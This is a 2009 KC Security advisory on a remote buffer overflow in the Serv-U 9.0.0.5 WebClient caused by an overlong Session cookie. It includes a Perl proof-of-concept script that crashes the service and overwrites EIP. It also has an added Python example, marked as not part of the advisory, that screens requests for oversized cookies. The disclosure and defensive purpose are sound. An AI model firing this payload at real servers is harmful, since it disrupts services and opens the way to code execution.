RhinoSoft.com Serv-U 9.0.0.5 WebClient Remote Buffer Overflow
Source: vfocus.net Author: Rangos Published: 2009-11-04
-- KC Security PUBLIC ADVISORY -- http://www.rangos.de -- 
11-01-2009


RhinoSoft.com Serv-U 9.0.0.5 WebClient Remote Buffer Overflow


Background
------------

Serv-U includes a simple, browser-based transfer client perfect
for every business environment. The Web Client is accessed through
a standard web browser and features an unintimidating, familiar interface.
It is a great way for sharing photos and image files with clients and
co-workers due to its configurable thumbnail view that allows remote
images to be quickly viewed without downloading the entire file.
An additional slideshow view offers a fast way to share a collection 
of photos from your latest projects. When using Serv-U, photo sharing 
sites and large email attachments are a thing of the past!


Description
------------

Remote exploitation of a buffer overflow in the Serv-U WebClient
may allow attackers to execute arbitrary code.

The problem lies in the handling of overly long session cookies.
When a very long Session cookie is sent to the Serv-U WebClient
HTTP service, an overrun occurs and EIP is overwritten.


Detection
------------
KC Security confirmed the vulnerability in the latest version of Serv-U
WebClient which is 9.0.0.5.


Workaround
------------
Disable the WebClient Service and use the Serv-U FTP/SFTP components only.
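
Where requests to the WebClient pass through a filtering proxy or a capture pipeline, the overlong Session cookie described above can be screened for by length. The following is an added example, not part of the KC Security advisory; the 256-byte limit, the function names and the sample requests are assumptions constructed for illustration.

```python
# Added example: screen raw HTTP request heads for oversized cookie values.
MAX_COOKIE_VALUE = 256   # assumed limit, not a figure from the advisory
WATCHED = {"session"}    # cookie name taken from the advisory's description


def parse_cookies(raw_head: bytes) -> list:
    """Return every (name, value) pair from all Cookie headers, duplicates kept."""
    pairs = []
    lines = raw_head.split(b"\r\n\r\n", 1)[0].split(b"\r\n")
    for line in lines[1:]:  # skip the request line
        name, sep, value = line.partition(b":")
        if not sep or name.strip().lower() != b"cookie":
            continue
        for pair in value.split(b";"):
            key, eq, val = pair.strip().partition(b"=")
            if eq:
                pairs.append((key.decode("latin-1"), val.decode("latin-1")))
    return pairs


def oversized_cookies(raw_head: bytes, limit: int = MAX_COOKIE_VALUE) -> list:
    """List (name, length) for each watched cookie whose value exceeds the limit."""
    return [
        (name, len(value))
        for name, value in parse_cookies(raw_head)
        if name.lower() in WATCHED and len(value) > limit
    ]


def build_request(session_value: str) -> bytes:
    """Constructed sample request head; host and cookie values are made up."""
    return (
        "POST / HTTP/1.1\r\n"
        "Host: webclient.example\r\n"
        f"Cookie: SULang=de%2CDE; themename=vista; Session={session_value}\r\n"
        "Content-Length: 0\r\n\r\n"
    ).encode("latin-1")


NORMAL = build_request("_" + "0123456789abcdef" * 7)  # 113-byte value
OVERLONG = build_request("_" + "0" * 4000)            # far past the limit

if __name__ == "__main__":
    for label, req in (("normal", NORMAL), ("overlong", OVERLONG)):
        print(label, oversized_cookies(req) or "ok")
```

Duplicate cookie names are kept as separate pairs so that a short Session value cannot mask a long one in the same header.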


Proof of concept
------------
The following Perl script will crash the Serv-U.exe service and overwrite
EIP with 0xAAAAAAAA.

---snip---
use IO::Socket;

$|=1;
$a = "A" x 100000;
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '80',
                              Proto    => 'tcp');                             

print $sock "POST / HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session=_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb950754581406246bf8$a\r\n"
."Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n"
."Content-Length: 0\r\n\r\n";

while (<$sock>) {
	print;
}
---snip---


Credit
------------
This vulnerability was discovered by Nikolaos Rangos of KC Security.
Visit us at http://www.rangos.de


 